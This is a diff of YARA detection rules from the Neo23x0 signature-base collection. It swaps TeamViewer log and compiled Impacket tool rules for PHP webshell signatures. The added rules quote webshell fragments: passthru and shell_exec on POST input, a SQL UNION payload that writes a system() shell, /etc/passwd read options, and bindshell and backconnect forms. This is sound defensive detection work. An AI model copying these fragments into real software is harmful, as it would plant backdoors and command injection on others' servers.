+		hash = "6454cc5ab73143d72cf0025a81bd1fe710351b44"
+		logic_hash = "63ebb0c673a5aee05d2d9d571ebf63942d826b5148a5f7ed587ba1efbb0dc923"
+		score = 75
 		quality = 85
 		tags = ""
-		limit = "Logscan"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "Changing keyboard layout to: 0804" ascii
-		$x2 = "Changing keyboard layout to: 042a"
-		$fp1 = "Changing keyboard layout to: 08040804" ascii
-		$fp2 = "Changing keyboard layout to: 042a042a" ascii
+		$s4 = "&nbsp;Iranian Hackers : WWW.SIMORGH-EV.COM <br>" fullword
+		$s5 = "//fake mail = Use victim server 4 DOS - fake mail " fullword
+		$s10 = "<a style=\"TEXT-DECORATION: none\" href=\"http://www.simorgh-ev.com\">" fullword
+		$s16 = "error_reporting(E_ERROR | E_WARNING | E_PARSE);" fullword
+		$s17 = "echo \"<font size='1' color='#999999'>Dont in windows\";" fullword
+		$s19 = "$Comments=$_POST['Comments'];" fullword
+		$s20 = "Victim Mail :<br><input type='text' name='to' ><br>" fullword
 
 	condition:
-		(#x1 + #x2 ) > ( #fp1 + #fp2 )
+		3 of them
 }
-rule SIGNATURE_BASE_LOG_Teamviewer_Connect_Russian_Keyboard_Layout
+rule SIGNATURE_BASE_WEBSHELL_H4Ntu_Shell_Powered_Tsoi_2 : FILE
 {
 	meta:
-		description = "Detects a suspicious TeamViewer log entry stating that the remote systems had a Russian keyboard layout"
-		author = "Florian Roth (Nextron Systems)"
-		id = "360a1cca-2a64-5fd8-bcde-f49e1b17281e"
-		date = "2019-10-12"
-		modified = "2022-12-07"
-		reference = "https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/default-input-locales-for-windows-language-packs"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/log_teamviewer_keyboard_layouts.yar#L23-L40"
+		description = "PHP Webshells Github Archive - file h4ntu shell [powered by tsoi].php"
+		author = "Florian Roth"
+		id = "252ecc2c-83e3-5ca5-a86a-caf76e63e79c"
+		date = "2014-04-06"
+		modified = "2025-03-21"
+		old_rule_name = "WebShell_h4ntu_shell__powered_by_tsoi_"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5759-L5774"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9de52ec41fb410fcff50d49eb7871eadd07b520c3cfa089e1eeecc580e610eaa"
-		score = 60
+		hash = "cbca8cd000e705357e2a7e0cf8262678706f18f9"
+		logic_hash = "c731f2f430e61277ec6c8e292aa50a31eea46fe67eb455811b3fbe9e8967a8c1"
+		score = 75
 		quality = 85
-		tags = ""
-		limit = "Logscan"
+		tags = "FILE"
 
 	strings:
-		$x1 = "Changing keyboard layout to: 0419" ascii
-		$fp1 = "Changing keyboard layout to: 04190419" ascii
+		$s1 = "<title>h4ntu shell [powered by tsoi]</title>" fullword
+		$s2 = "$uname = posix_uname( );" fullword
+		$s3 = "if(!$whoami)$whoami=exec(\"whoami\");" fullword
+		$s4 = "echo \"<p><font size=2 face=Verdana><b>This Is The Server Information</b></font>"
 
 	condition:
-		#x1> #fp1
+		filesize < 2MB and 2 of them
 }
-rule SIGNATURE_BASE_Impacket_Tools_Wmiexec : FILE
+rule SIGNATURE_BASE_Webshell_Php_Webshells_Myshell
 {
 	meta:
-		description = "Compiled Impacket Tools"
+		description = "PHP Webshells Github Archive - file MyShell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3c2c7edf-da71-53dc-9ddf-dfbf10838a27"
-		date = "2017-04-07"
-		modified = "2025-03-29"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L32-L47"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5776-L5794"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1ac78768ae230aa00f392f7a7886589b14814e9c7379528d2ecd218852086ee4"
+		hash = "42e283c594c4d061f80a18f5ade0717d3fb2f76d"
+		logic_hash = "2c39ffecb44ce2f936ba3563c6086d8b2ed75aec3b57b45e2a1f5e7321ac9a3f"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "19544863758341fe7276c59d85f4aa17094045621ca9c98f8a9e7307c290bad4"
 
 	strings:
-		$s1 = "bwmiexec.exe.manifest" fullword ascii
-		$s2 = "swmiexec" fullword ascii
-		$s3 = "\\yzHPlU=QA" ascii
+		$s3 = "<title>MyShell error - Access Denied</title>" fullword
+		$s4 = "$adminEmail = \"youremail@yourserver.com\";" fullword
+		$s5 = "//A workdir has been asked for - we chdir to that dir." fullword
+		$s6 = "system($command . \" 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o"
+		$s13 = "#$autoErrorTrap Enable automatic error traping if command returns error." fullword
+		$s14 = "/* No work_dir - we chdir to $DOCUMENT_ROOT */" fullword
+		$s19 = "#every command you excecute." fullword
+		$s20 = "<form name=\"shell\" method=\"post\">" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and 2 of them )
+		3 of them
 }
-rule SIGNATURE_BASE_Impacket_Tools_Sniffer : FILE
+rule SIGNATURE_BASE_Webshell_Php_Webshells_Pws
 {
 	meta:
-		description = "Compiled Impacket Tools"
+		description = "PHP Webshells Github Archive - file pws.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "07051edc-91a8-59d6-87bf-dba98ef28588"
-		date = "2017-04-07"
-		modified = "2025-03-29"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L49-L63"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5795-L5811"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "77f4a7cdfced27ea342fe0fe6debebb720b7494b3f352465ab2fd92f2b7178ab"
+		hash = "7a405f1c179a84ff8ac09a42177a2bcd8a1a481b"
+		logic_hash = "4b2eeb80200cc5dffa80cddc74f1902c0e8a5d2313d9a20d02eeb99ccb668ec0"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "efff15e1815fb3c156678417d6037ddf4b711a3122c9b5bc2ca8dc97165d3769"
 
 	strings:
-		$s1 = "ssniffer" fullword ascii
-		$s2 = "impacket.dhcp(" ascii
+		$s6 = "if ($_POST['cmd']){" fullword
+		$s7 = "$cmd = $_POST['cmd'];" fullword
+		$s10 = "echo \"FILE UPLOADED TO $dez\";" fullword
+		$s11 = "if (file_exists($uploaded)) {" fullword
+		$s12 = "copy($uploaded, $dez);" fullword
+		$s17 = "passthru($cmd);" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 15000KB and all of them )
+		4 of them
 }
-rule SIGNATURE_BASE_Impacket_Tools_Mmcexec : FILE
+rule SIGNATURE_BASE_Webshell_Reader_Asp_Php
 {
 	meta:
-		description = "Compiled Impacket Tools"
+		description = "PHP Webshells Github Archive - file reader.asp.php.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cca2082f-72a4-50c8-80b8-a9bed430dc4e"
-		date = "2017-04-07"
-		modified = "2025-03-29"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L65-L79"
+		id = "80ec18e1-6f41-5188-b2d5-f4228c975fa1"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5812-L5826"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1aee75155ed3d868f576d7d650f0791ac54e351851f7bfb65390b4ae5c4c83b9"
+		hash = "70656f3495e2b3ad391a77d5208eec0fb9e2d931"
+		logic_hash = "6ffda38584b6cdec818af8e09c62bb4a46f40230ffd5c1a68993a91c37f67680"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "263a1655a94b7920531e123a8c9737428f2988bf58156c62408e192d4b2a63fc"
 
 	strings:
-		$s1 = "smmcexec" fullword ascii
-		$s2 = "\\yzHPlU=QA" ascii
+		$s5 = "ster\" name=submit> </Font> &nbsp; &nbsp; &nbsp; <a href=mailto:mailbomb@hotmail"
+		$s12 = " HACKING " fullword
+		$s16 = "FONT-WEIGHT: bold; BACKGROUND: #ffffff url('images/cellpic1.gif'); TEXT-INDENT: "
+		$s20 = "PADDING-RIGHT: 8px; PADDING-LEFT: 8px; FONT-WEIGHT: bold; FONT-SIZE: 11px; BACKG"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 16000KB and all of them )
+		3 of them
 }
-rule SIGNATURE_BASE_Impacket_Tools_Ifmap : FILE
+rule SIGNATURE_BASE_Webshell_Safe_Mode_Bypass_PHP_4_4_2_And_PHP_5_1_2_3
 {
 	meta:
-		description = "Compiled Impacket Tools"
+		description = "PHP Webshells Github Archive - file Safe_Mode_Bypass_PHP_4.4.2_and_PHP_5.1.2.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e5461916-ec2b-5f65-b938-267483f50bb2"
-		date = "2017-04-07"
-		modified = "2025-03-29"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L81-L95"
+		id = "349cf6ac-92b3-59f7-a6e4-c23e69b454c6"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		old_rule_name = "WebShell_Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5827-L5844"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "bbe875e03434c040da914e81ec5ef691ba8fd02607631e118d958819d0e94ff5"
+		hash = "db076b7c80d2a5279cab2578aa19cb18aea92832"
+		logic_hash = "6840af0d9f99277277edce93deb54e9a319c8938169701c89fdeb65207590951"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "20a1f11788e6cc98a76dca2db4691963c054fc12a4d608ac41739b98f84b3613"
 
 	strings:
-		$s1 = "bifmap.exe.manifest" fullword ascii
-		$s2 = "impacket.dcerpc.v5.epm(" ascii
+		$s1 = "<option value=\"/etc/passwd\">Get /etc/passwd</option>" fullword
+		$s6 = "by PHP Emperor<xb5@hotmail.com>" fullword
+		$s9 = "\".htmlspecialchars($file).\" has been already loaded. PHP Emperor <xb5@hotmail."
+		$s11 = "die(\"<FONT COLOR=\\\"RED\\\"><CENTER>Sorry... File" fullword
+		$s15 = "if(empty($_GET['file'])){" fullword
+		$s16 = "echo \"<head><title>Safe Mode Shell</title></head>\"; " fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 15000KB and all of them )
+		3 of them
 }
-rule SIGNATURE_BASE_Karmasmb : FILE
+rule SIGNATURE_BASE_Webshell_Liz0Zim_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_2
 {
 	meta:
-		description = "Compiled Impacket Tools"
+		description = "PHP Webshells Github Archive - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "32c810c7-02e7-5203-b2ed-4e930b318cc0"
-		date = "2017-04-07"
-		modified = "2025-03-29"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L97-L110"
+		id = "b647f529-be81-51ad-b671-84aec410e133"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		old_rule_name = "WebShell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5845-L5861"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "94322dda799bcb25caeb7f9e526bcc14c6dfd9247080b4bb79dcd7b340fcb36c"
+		hash = "b2b797707e09c12ff5e632af84b394ad41a46fa4"
+		logic_hash = "92bfac3516a448bbb3e78cf8950c6e816bf35d0ae2f3d32bc9b9b2836309999b"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d256d1e05695d62a86d9e76830fcbb856ba7bd578165a561edd43b9f7fdb18a3"
 
 	strings:
-		$s1 = "bkarmaSMB.exe.manifest" fullword ascii
+		$s4 = "$liz0zim=shell_exec($_POST[liz0]); " fullword
+		$s6 = "$liz0=shell_exec($_POST[baba]); " fullword
+		$s9 = "echo \"<b><font color=blue>Liz0ziM Private Safe Mode Command Execuriton Bypass E"
+		$s12 = " :=) :</font><select size=\"1\" name=\"liz0\">" fullword
+		$s13 = "<option value=\"cat /etc/passwd\">/etc/passwd</option>" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Samrdump : FILE
+rule SIGNATURE_BASE_Webshell_PHP_Backdoor_2
 {
 	meta:
-		description = "Compiled Impacket Tools"
+		description = "PHP Webshells Github Archive - file php-backdoor.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cd274719-c8cc-5882-8d75-192ad822c6b3"
-		date = "2017-04-07"
-		modified = "2025-03-29"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L112-L126"
+		id = "65e1305b-4fc7-5885-b3df-92846bb57fe3"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		old_rule_name = "WebShell_php_backdoor"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5862-L5878"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6bc0a4d9f9bd0d72e7f2ce4b0f8608296e6f2db14fd3a1740e0eebfe35629018"
+		hash = "b190c03af4f3fb52adc20eb0f5d4d151020c74fe"
+		logic_hash = "4228bcbfff5d7756615347196270f7916843e2aceacc7298610070b8b923381b"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4c2921702d18e0874b57638433474e54719ee6dfa39d323839d216952c5c834a"
 
 	strings:
-		$s2 = "bsamrdump.exe.manifest" fullword ascii
-		$s3 = "ssamrdump" fullword ascii
+		$s5 = "http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix" fullword
+		$s6 = "// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombi"
+		$s11 = "if(!isset($_REQUEST['dir'])) die('hey,specify directory!');" fullword
+		$s13 = "else echo \"<a href='$PHP_SELF?f=$d/$dir'><font color=black>\";" fullword
+		$s15 = "<pre><form action=\"<? echo $PHP_SELF; ?>\" METHOD=GET >execute command: <input "
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Impacket_Tools_Rpcdump : FILE
+rule SIGNATURE_BASE_Webshell_Worse_Linux_Shell_2
 {
 	meta:
-		description = "Compiled Impacket Tools"
+		description = "PHP Webshells Github Archive - file Worse Linux Shell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3f998aa6-c260-5fef-99ef-e8b4770c68c6"
-		date = "2017-04-07"
-		modified = "2025-03-29"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L128-L142"
+		id = "04ed7464-29d1-54b9-98ff-afc03475b220"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		old_rule_name = "WebShell_Worse_Linux_Shell"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5879-L5896"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cf0a64391ef0a5d3f87996fb3e4f152a3ff4938356b96f840aa3f4f4f30aaa97"
+		hash = "64623ab1246bc8f7d256b25f244eb2b41f543e96"
+		logic_hash = "6480c524213583511253ea1d37820994bba8a86f58a3775d4a9e4325725289d8"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "21d85b36197db47b94b0f4995d07b040a0455ebbe6d413bc33d926ee4e0315d9"
 
 	strings:
-		$s1 = "srpcdump" fullword ascii
-		$s2 = "impacket.dcerpc.v5.epm(" ascii
+		$s4 = "if( $_POST['_act'] == \"Upload!\" ) {" fullword
+		$s5 = "print \"<center><h1>#worst @dal.net</h1></center>\";" fullword
+		$s7 = "print \"<center><h1>Linux Shells</h1></center>\";" fullword
+		$s8 = "$currentCMD = \"ls -la\";" fullword
+		$s14 = "print \"<tr><td><b>System type:</b></td><td>$UName</td></tr>\";" fullword
+		$s19 = "$currentCMD = str_replace(\"\\\\\\\\\",\"\\\\\",$_POST['_cmd']);" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
+		2 of them
 }
-rule SIGNATURE_BASE_Impacket_Tools_Secretsdump : FILE
+rule SIGNATURE_BASE_Webshell_Php_Webshells_Phpinj
 {
 	meta:
-		description = "Compiled Impacket Tools"
+		description = "PHP Webshells Github Archive - file pHpINJ.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c944d051-ea24-5595-abef-59e326ad56de"
-		date = "2017-04-07"
-		modified = "2025-03-29"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L144-L158"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5897-L5914"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "462748d60764c6fbaeede48b5a98cb68f61cf695f976bf6db94cb497be48fcb2"
+		hash = "75116bee1ab122861b155cc1ce45a112c28b9596"
+		logic_hash = "271efaa8f370376f971d3d59256658b341599ac554cc216e09401e44b16bdede"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "47afa5fd954190df825924c55112e65fd8ed0f7e1d6fd403ede5209623534d7d"
 
 	strings:
-		$s1 = "ssecretsdump" fullword ascii
-		$s2 = "impacket.ese(" ascii
+		$s3 = "echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';" fullword
+		$s10 = "<form action = \"<?php echo \"$_SERVER[PHP_SELF]\" ; ?>\" method = \"post\">" fullword
+		$s11 = "$sql = \"0' UNION SELECT '0' , '<? system(\\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 IN"
+		$s13 = "Full server path to a writable file which will contain the Php Shell <br />" fullword
+		$s14 = "$expurl= $url.\"?id=\".$sql ;" fullword
+		$s15 = "<header>||   .::News PHP Shell Injection::.   ||</header> <br /> <br />" fullword
+		$s16 = "<input type = \"submit\" value = \"Create Exploit\"> <br /> <br />" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Impacket_Tools_Esentutl : FILE
+rule SIGNATURE_BASE_Webshell_Php_Webshells_NGH
 {
 	meta:
-		description = "Compiled Impacket Tools"
+		description = "PHP Webshells Github Archive - file NGH.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1965e2b3-54be-553a-83d6-a0d4919414dd"
-		date = "2017-04-07"
-		modified = "2025-03-29"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L160-L174"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5915-L5932"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e972ad610df65309f4e5996ad0b537670b944f43b810fda5a890ea995193a97a"
+		hash = "c05b5deecfc6de972aa4652cb66da89cfb3e1645"
+		logic_hash = "572b026545b012951136bdb9b1101e38f27bc3321b895799bc853ea1190877f9"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "70d854953d3ebb2c252783a4a103ba0e596d6ab447f238af777fb37d2b64c0cd"
 
 	strings:
-		$s1 = "impacket.ese(" ascii
-		$s2 = "sesentutl" fullword ascii
+		$s0 = "<title>Webcommander at <?=$_SERVER[\"HTTP_HOST\"]?></title>" fullword
+		$s2 = "/* Webcommander by Cr4sh_aka_RKL v0.3.9 NGH edition :p */" fullword
+		$s5 = "<form action=<?=$script?>?act=bindshell method=POST>" fullword
+		$s9 = "<form action=<?=$script?>?act=backconnect method=POST>" fullword
+		$s11 = "<form action=<?=$script?>?act=mkdir method=POST>" fullword
+		$s16 = "die(\"<font color=#DF0000>Login error</font>\");" fullword
+		$s20 = "<b>Bind /bin/bash at port: </b><input type=text name=port size=8>" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 11000KB and all of them )
+		2 of them
 }
-rule SIGNATURE_BASE_Impacket_Tools_Opdump : FILE
+rule SIGNATURE_BASE_Webshell_Php_Webshells_Matamu
 {
 	meta:
-		description = "Compiled Impacket Tools"
+		description = "PHP Webshells Github Archive - file matamu.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1bb0e747-e9b7-5a54-8052-428351be8d0d"
-		date = "2017-04-07"
-		modified = "2025-03-29"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L176-L190"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5933-L5949"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "18b772e19fd61d77f3a671ee097e0f032738a73a360f4cfe79df4eb6377e12b1"
+		hash = "d477aae6bd2f288b578dbf05c1c46b3aaa474733"
+		logic_hash = "c0101dab5fe7c3a2652b2e23e1ef0274364137895a402a0367c6b5474c0e8a1f"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e2205539f29972d4e2a83eabf92af18dd406c9be97f70661c336ddf5eb496742"
 
 	strings:
-		$s2 = "bopdump.exe.manifest" fullword ascii
-		$s3 = "sopdump" fullword ascii
+		$s2 = "$command .= ' -F';" fullword
+		$s3 = "/* We try and match a cd command. */" fullword
+		$s4 = "directory... Trust me - it works :-) */" fullword
+		$s5 = "$command .= \" 1> $tmpfile 2>&1; \" ." fullword
+		$s10 = "$new_dir = $regs[1]; // 'cd /something/...'" fullword
+		$s16 = "/* The last / in work_dir were the first charecter." fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
+		2 of them
 }
-rule SIGNATURE_BASE_Impacket_Tools_Sniff : FILE
+rule SIGNATURE_BASE_Webshell_Ru24_Post_Sh
 {
 	meta:
-		description = "Compiled Impacket Tools"
+		description = "PHP Webshells Github Archive - file ru24_post_sh.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "07051edc-91a8-59d6-87bf-dba98ef28588"
-		date = "2017-04-07"
-		modified = "2025-03-29"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L192-L206"
+		id = "86a45d72-c42d-58d5-9969-d3ebfc22853d"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5950-L5965"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b317e23d1f76cec4d5b14cb95d463ec410551052b30f1d2d5f52a441104108c0"
+		hash = "d2c18766a1cd4dda928c12ff7b519578ccec0769"
+		logic_hash = "6cf15a67c311979d32edfb443701cef34ee32d7a672314fc7b60b262b6b2c402"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8ab2b60aadf97e921e3a9df5cf1c135fbc851cb66d09b1043eaaa1dc01b9a699"
 
 	strings:
-		$s1 = "ssniff" fullword ascii
-		$s2 = "impacket.eap(" ascii
+		$s1 = "http://www.ru24-team.net" fullword
+		$s4 = "if ((!$_POST['cmd']) || ($_POST['cmd']==\"\")) { $_POST['cmd']=\"id;pwd;uname -a"
+		$s6 = "Ru24PostWebShell"
+		$s7 = "Writed by DreAmeRz" fullword
+		$s9 = "$function=passthru; // system, exec, cmd" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 15000KB and all of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Impacket_Tools_Smbexec : FILE
+rule SIGNATURE_BASE_Webshell_Hiddens_Shell_V1
 {
 	meta:
-		description = "Compiled Impacket Tools"
+		description = "PHP Webshells Github Archive - file hiddens shell v1.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "02208817-2eab-54e2-90cf-44dbf5474607"
-		date = "2017-04-07"
-		modified = "2025-03-29"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_impacket_tools.yar#L208-L222"
+		id = "7194998e-c84c-5f59-92fe-857ecf7e8e88"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5966-L5977"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0f424dd5cc525ef0bd9671c4c1b8da0a1ff9eb79056cc081c1ebe7c9bf75fee6"
